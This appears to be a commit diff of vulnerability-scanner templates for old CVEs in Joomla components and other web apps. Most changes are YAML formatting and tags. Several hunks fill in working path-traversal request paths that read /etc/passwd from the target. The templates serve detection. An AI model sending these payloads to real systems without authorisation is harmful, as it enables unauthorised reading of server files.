updates

cves/2010/CVE-2010-2045.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in the Dione Form Wizard (aka FDione or com_dioneformwizard) component 1.0.2 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/12595
     - https://www.cvedetails.com/cve/CVE-2010-2045
   tags: cve,cve2010,joomla,lfi
@@ -13,7 +13,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=[LFI]%00"
+      - "{{BaseURL}}/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00"
 
     matchers-condition: and
     matchers:

cves/2010/CVE-2010-2680.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/14064
     - https://www.cvedetails.com/cve/CVE-2010-2680
   tags: cve,cve2010,joomla,lfi
@@ -13,7 +13,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=[LFI]"
+      - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
 
     matchers-condition: and
     matchers:

cves/2010/CVE-2010-2918.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: PHP remote file inclusion vulnerability in core/include/myMailer.class.php in the Visites (com_joomla-visites) component 1.1 RC2 for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/31708
     - https://www.cvedetails.com/cve/CVE-2010-2918
   tags: cve,cve2010,joomla,lfi
@@ -13,7 +13,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=[evilcode]"
+      - "{{BaseURL}}/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd"
 
     matchers-condition: and
     matchers:

cves/2010/CVE-2010-4282.yaml

@@ -5,10 +5,10 @@ info:
   author: daffainfo
   severity: high
   description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/15643
     - https://www.cvedetails.com/cve/CVE-2010-4282
-  tags: cve,cve2010,lfi
+  tags: cve,cve2010,lfi,joomla
 
 requests:
   - method: GET

cves/2010/CVE-2010-4719.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/15749
     - https://www.cvedetails.com/cve/CVE-2010-4719
   tags: cve,cve2010,joomla,lfi
@@ -13,7 +13,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?option=com_jradio&controller=[LFI]%00"
+      - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
 
     matchers-condition: and
     matchers:

cves/2010/CVE-2010-4769.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/15585
     - https://www.cvedetails.com/cve/CVE-2010-4769
   tags: cve,cve2010,joomla,lfi
@@ -13,7 +13,7 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00"
+      - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
 
     matchers-condition: and
     matchers:

cves/2010/CVE-2010-4977.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: SQL injection vulnerability in menu.php in the Canteen (com_canteen) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the mealid parameter to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/34250
     - https://www.cvedetails.com/cve/CVE-2010-4977
   tags: cve,cve2010,joomla,lfi

cves/2010/CVE-2010-5028.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/12601
     - https://www.cvedetails.com/cve/CVE-2010-5028
   tags: cve,cve2010,joomla,lfi

cves/2010/CVE-2010-5286.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/34837
     - https://www.cvedetails.com/cve/CVE-2010-5286
   tags: cve,cve2010,joomla,lfi

cves/2011/CVE-2011-2744.yaml

@@ -5,10 +5,10 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/35945
     - https://www.cvedetails.com/cve/CVE-2011-2744
-  tags: cve,cve2011,lfi
+  tags: cve,cve2011,lfi,chyrp
 
 requests:
   - method: GET

cves/2012/CVE-2012-0981.yaml

@@ -8,7 +8,7 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/18435
     - https://www.cvedetails.com/cve/CVE-2012-0981
-  tags: cve,cve2012,lfi
+  tags: cve,cve2012,lfi,phpshowtime
 
 requests:
   - method: GET

cves/2012/CVE-2012-0996.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/36784
     - https://www.cvedetails.com/cve/CVE-2012-0996
   tags: cve,cve2012,lfi

cves/2012/CVE-2012-1226.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/36873
     - https://www.cvedetails.com/cve/CVE-2012-1226
   tags: cve,cve2012,lfi

cves/2014/CVE-2014-10037.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/30865
     - https://www.cvedetails.com/cve/CVE-2014-10037
   tags: cve,cve2014,lfi

cves/2014/CVE-2014-5258.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/34761
     - https://www.cvedetails.com/cve/CVE-2014-5258
   tags: cve,cve2014,lfi

cves/2015/CVE-2015-1000012.yaml

@@ -7,13 +7,13 @@ info:
   reference:
     - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
-  tags: cve,cve2015,wordpress,wp-plugin,lfi
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.50
     cve-id: CVE-2015-1000012
     cwe-id: CWE-200
   description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin"
+  tags: cve,cve2015,wordpress,wp-plugin,lfi
 
 requests:
   - method: GET

cves/2015/CVE-2015-4414.yaml

@@ -5,7 +5,7 @@ info:
   author: daffainfo
   severity: high
   description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
-  reference: |
+  reference:
     - https://www.exploit-db.com/exploits/37274
     - https://www.cvedetails.com/cve/CVE-2015-4414
   tags: cve,cve2015,wordpress,wp-plugin,lfi